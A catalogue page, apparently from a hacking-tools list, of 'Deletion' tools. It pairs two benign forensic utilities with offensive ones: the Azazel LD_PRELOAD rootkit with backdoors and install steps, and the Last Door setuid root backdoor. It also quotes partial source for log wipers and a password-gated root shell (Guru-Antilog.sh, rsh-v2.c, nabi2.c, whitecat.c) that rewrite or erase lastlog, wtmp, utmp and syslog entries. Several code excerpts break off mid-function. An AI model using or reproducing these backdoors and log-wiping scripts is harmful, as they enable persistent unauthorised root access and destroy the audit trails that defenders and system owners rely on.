Deletion

Tools to remove files, usually dealing with log wiping or secure deletion

Foremost

Foremost is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc., or directly on a drive. The headers and footers can be specified by a configuration file, or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format, allowing for a more reliable and faster recovery.

HxD

HxD is a carefully designed and fast hex editor which, in addition to raw disk editing and modifying of main memory (RAM), handles files of any size.

The easy to use interface offers features such as searching and replacing, exporting, checksums/digests, insertion of byte patterns, a file shredder, concatenation or splitting of files, statistics and much more.

Editing works like in a text editor, with a focus on simple and task-oriented operation; functions were streamlined to hide differences that are purely technical. For example, drives and memory are presented similarly to a file and are shown as a whole, in contrast to a sector/region-limited view that cuts off data which potentially belongs together. Drives and memory can be edited the same way as a regular file, including support for undo. In addition, memory sections define a foldable region, and inaccessible sections are hidden by default.

Operating System:
Windows 95, 98, ME, NT 4, 2000, XP, 2003, Vista, or 7

Azazel

Azazel is a userland rootkit written in C, based on the original LD_PRELOAD technique from the Jynx rootkit. It is more robust and has additional features, and focuses heavily on anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.

Features:
Anti-debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells.

Crypthook encrypted accept() backdoor
Plaintext accept() backdoor

PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings

Installation:
Clone the sources
localhost:~ $ git clone https://github.com/chokepoint/azazel.git

Build the rootkit
localhost:~ $ make

Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as libselinux.so into /lib. An entry is then added to /etc/ld.so.preload in order to hook system wide dynamically compiled programs.

Example runtime hooking of bash.
localhost:~ $ LD_PRELOAD=/lib/libselinux.so bash -l

Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list.
This allows all of the required functions to be linked upon initiation of the library.
Syscall function names are XORed by config.py and written to const.h
Original libc functions can be accessed by using the preprocessor definitions also in const.h
Each definition has a prefix of SYS_name_of_function_in_caps.
For example to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func();
typedef struct struct_syscalls {

Linux Log Eraser

Linux Log Eraser is a set of shell scripts that will cleanly search for specific data in log files and wipe it.

Last Door Log Wiper

Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.

 ___________
|           |Linux
|<Last|Door>|Root-
| --------- |Backdoor
|         O |&
|           |Log-
|           |Cleaner
|___________|~r0ng

Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)

Release Dec 2012 -V1

For a full writeup of the program, please visit my blog, URL above.

[+] What is it?

It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.

[+] Features?

- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
   - Search string replace with new string (e.g. change your ip in the logs)
   - Search string delete string
   - Search string delete line
   - Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
   - User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
   - If you don't logout prior to the process starting, the file search process will be displayed
   - If you do logout prior to the process starting, this will allow your .bash_history to refresh
     and be included in the search (should you want to delete your ./LastDoor command, for example).
[+] Compile/use?

- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)

- non-rootuser:~# /bin/LastDoor (run!)

whitecat.c

WhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.

/*
 *  This is WhiteCat logcleaner version 1.0 by ShadOS from Hell Knights Crew.
 *  It supports perl compatible regular expressions and cleans any binary and
 *  text log files (just correct source a little). WhiteCat is designed for
 *  any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
 *  Use it only for educational purpose.
 *  Don't forget to visit our site and my homepage for new releases:
 *  http://hellknights.void.ru
 *  http://shados.0x48k.cc
 *  Also, you can mail me any bugs or suggestions:
 *  shados /\./\ real.xakep.ru
 *  shados /\./\ 0x48k.cc
 *
 *  Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2, or (at your option)
 *  any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software Foundation,
 *  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.  
 */

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <utmp.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#include <regex.h>
#include <limits.h> /* for PATH_MAX */
#include <getopt.h>


#ifndef UTMP_FILE
    #define UTMP_FILE "/var/run/utmp"
#endif
#ifndef WTMP_FILE
    #define WTMP_FILE "/var/log/wtmp"
#endif

Guru-Antilog.sh

A bash script to wipe or exchange your IP in Unix log files. Also wipes out /root/.bash_history.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ?  "
read word
word=$word
echo -n " What's the Fake ip y0 want  using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
 syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
 echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
 echo " i can't find access_log "

rsh-v2.c

Unix log cleaner that also checks to see if root is logged in.

/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/

/* The header names were stripped by HTML extraction (the angle-bracket
   parts were eaten as tags); they are reconstructed here from the
   functions the code below actually uses. */
#include <stdio.h>        /* printf, fopen */
#include <stdlib.h>       /* exit, unsetenv */
#include <string.h>       /* strcmp */
#include <unistd.h>       /* setuid, execl */
#include <sys/utsname.h>  /* uname, struct utsname */
#include <pwd.h>          /* getpwnam, struct passwd */
#include <utmp.h>         /* struct utmp */
#include <lastlog.h>      /* struct lastlog */

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

int main(int argc, char *argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);

if(argc < 3){ /* argv[1] (password) and argv[2] (user) are both read below */
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

nabi2.c

Nabi version 2.0 - Advanced /var log wiper for Linux.

/*

     Advanced /var log wiper for linux

     nabi ver 2 ( friendly zap2.c )


    Release Date:
    nabi ver 2 - 3.8 2006 (Wed)
         nabi ver 1 - 1.15 2006 (Sun)
 
  1: zap2)
      # ./nabi -z root
  2: history cleanup)
      # ./nabi -h
  3: string change)
      # ./nabi -r 111.111.111.111 222.222.222.222 ( you must check these strings length is same)
      # ./nabi -r 'pts/1' 'tty/0' ( yo ~! )

    Tested on:
      - Debian 3.0r1
      - RH 9.0
      - Fedora core 2
      ..

    CHANGED:
      - add program option parser for split features on this file.
      - erased minor version number of this program.

    BUG FIXED:
      - when if you typed "./nabi root 'pts/1' 'pts/2' then you may had an error
        cause the not proper slashes of 's/pts/1/pts/2' but now it's okay.
        see escape_slash().
   
  comment:
    i become a curious guy when i'm typing some code. what about you all?
    for more useful toolkit. brb!

   
*/



#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define MAX_PATH        1024
#define MAX_DEPTH       128

#define  PROGRAM      "Nabi ver 2 ( [email protected] )"


/*
#define DEBUG
*/


/* proto type */
int insert_node(char *filename);
void load_dir(int cdepth);
void init_list();
void show_list();
void exploit(char *string, char *newstring);
void history_cleanup();
void zap2_main(char *user);
void escape_slash(char *pstr);

/* linked-list stuffs for file list */
struct file_list
{
        struct file_list *next;
        int depth;
        char d_name[MAX_PATH];
} *head, *tail;

static char root_dir[] = "/var";

int main(int argc, char *argv[])
{
        struct dirent *dp;

RopeADope

#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# Ropeadope.py -- RopeADope v1.1                                               #
#                                                                              #
# DATE                                                                         #
# 04/20/2012                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# A linux log cleaner                                                          #
#                                                                              #
# AUTHOR                                                                       #
# pr1me [at] highhacksociety [dot] com                                         #
# http://www.nullsecurity.net/ - http://www.highhacksociety                    #
#                                                                              #
################################################################################
